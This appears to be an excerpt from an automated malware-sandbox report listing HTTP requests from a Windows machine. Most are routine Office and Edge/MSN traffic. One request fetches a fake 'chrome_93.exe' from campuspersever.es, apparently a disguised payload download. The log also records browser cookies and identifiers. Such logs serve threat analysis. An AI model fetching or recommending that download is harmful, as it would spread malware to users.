                      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /chrome_93.exe HTTP/1.1Host: campuspersever.esCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=31232435889767F20B43311389B266D3&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=751d1878015b49ce805869d70676126e HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=31232435889767F20B43311389B266D3; _EDGE_S=F=1&SID=1A3CA821F91261D81DCEBD07F86460D7; _EDGE_V=1
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msIAw.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB14D0jG.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msFQA.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msG0W.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /b?rn=1730149368269&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=31232435889767F20B43311389B266D3&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=31232435889767F20B43311389B266D3&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=cc9c3eabe3164e239cd65905047e80f2 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=31232435889767F20B43311389B266D3; _EDGE_S=F=1&SID=1A3CA821F91261D81DCEBD07F86460D7; _EDGE_V=1
                      Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1730149368269&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=490a2f67b40a434ab4bd51de99d9857b&activityId=490a2f67b40a434ab4bd51de99d9857b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=31232435889767F20B43311389B266D3; _EDGE_S=F=1&SID=1A3CA821F91261D81DCEBD07F86460D7; _EDGE_V=1
                      Source: global trafficHTTP traffic detected: GET /b2?rn=1730149368269&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=31232435889767F20B43311389B266D3&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=181e1663f3ca10978d2eec81730149370; XID=181e1663f3ca10978d2eec81730149370
                      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
